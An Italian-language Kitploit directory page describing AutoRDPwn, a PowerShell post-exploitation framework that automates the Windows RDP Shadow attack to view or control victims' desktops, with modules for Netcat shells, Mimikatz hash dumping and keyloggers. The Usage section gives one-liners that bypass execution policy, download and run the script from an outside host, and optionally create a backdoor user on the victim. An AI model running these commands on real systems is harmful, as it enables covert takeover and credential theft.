Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
AutoRDPwn — Il Framework Shadow Attack | Kitploit
Strumenti/GitHubGitHub/joelgmsec/autordpwn
Password CrackingEscalation di PrivilegiGenerazione di PayloadMovimento LateralePost-ExploitPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubjoelgmsec/autordpwn

AutoRDPwn

Il Framework Shadow Attack

Vedi Repository
1.1k4994 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

AutoRDPwn

AutoRDPwn è un framework di post-exploitation creato in Powershell, progettato principalmente per automatizzare l'attacco Shadow sui computer Microsoft Windows. Questa vulnerabilità (elencata come funzionalità da Microsoft) consente a un utente malintenzionato remoto di visualizzare il desktop della vittima senza il suo consenso e persino di controllarlo su richiesta, utilizzando strumenti nativi del sistema operativo stesso.

Grazie ai moduli aggiuntivi, è possibile ottenere una shell remota tramite Netcat, dumpare gli hash di sistema con Mimikatz, caricare un keylogger remoto e molto altro. Il tutto attraverso un menu completamente intuitivo in sette lingue diverse.

Inoltre, è possibile utilizzarlo in una reverse shell tramite una serie di parametri descritti nella sezione Utilizzo.

Requisiti

Powershell 4.0 o superiore

Modifiche

Versione 5.1

• Molti bug corretti

• Miglioramenti estetici e tempi di attesa ottimizzati

• Connessione Proxy-Aware tramite le impostazioni di sistema

• Ora è possibile utilizzare lo strumento offline scaricando il file .zip

• Rilevamento automatico della lingua premendo il tasto Invio

• Invoke-DCOM è stato sostituito da SharpRDP

• PowerUp è stato sostituito da Invoke-PrivescCheck

• Creazione della subroutine di pulizia automatica sulla vittima

• Nuovo modulo disponibile: SMB Shell crittografata con AES

• Nuovo modulo disponibile: Cambio utente con RunAs

*Le restanti modifiche possono essere consultate nel file CHANGELOG

Utilizzo

Questa applicazione può essere utilizzata localmente, in remoto o per fare pivot tra macchine.

Quando utilizzata in remoto in una reverse shell, è necessario usare i seguenti parametri:

Esecuzione locale su una riga:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Esempio di esecuzione remota su una riga:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

La guida dettagliata all'utilizzo è disponibile al seguente link:

https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshot

AutoRDPwn1_en AutoRDPwn2_en

Licenza

Questo progetto è concesso in licenza GNU 3.0 - consulta il file LICENSE per maggiori dettagli.

Crediti e Ringraziamenti

Questo framework è stato creato e progettato da zero da Joel Gámez Molina // @JoelGMSec

Alcuni moduli utilizzano codice, script e strumenti di terze parti, in particolare:

• Chachi-Enumerator di Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools

• Invoke-Phant0m di Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m

• Invoke-PowerShellTcp di Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang

• Invoke-TheHash di Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash

• Mimikatz di Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz

• PsExec di Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

• RDP Wrapper di Stas'M Corp. --> https://github.com/stascorp/rdpwrap

• SharpRDP di Steven F --> https://github.com/0xthirteen/SharpRDP

E molti altri, che non trovano spazio qui.. Grazie a tutti loro e al loro eccellente lavoro.

Contatto

Questo software non offre alcun tipo di garanzia. Il suo utilizzo è esclusivo per ambienti educativi e/o audit di sicurezza con il corrispondente consenso del cliente. Non sono responsabile per il suo uso improprio o per eventuali danni causati da esso.

Per maggiori informazioni, puoi trovarmi su Twitter come @JoelGMSec e sul mio blog darkbyte.net.

Supporto

Puoi supportare il mio lavoro offrendomi un caffè:

buymeacoffe

Scarica lo strumento
ParametroDescrizione
-admin / -noadminA seconda dei permessi che abbiamo, ne useremo uno o l'altro
-noguiQuesto eviterà di caricare il menu e alcuni colori, garantendo la funzionalità
-langSceglieremo la nostra lingua (Inglese, Spagnolo, Francese, Tedesco, Italiano, Russo o Portoghese)
-optionCome con il menu, possiamo scegliere come lanciare l'attacco
-shadowDecideremo se vogliamo vedere o controllare il dispositivo remoto
-createuserQuesto parametro è opzionale, l'utente AutoRDPwn:AutoRDPwn verrà creato sulla macchina vittima
-nocleanDisabilita il processo di annullamento di tutte le modifiche sul computer vittima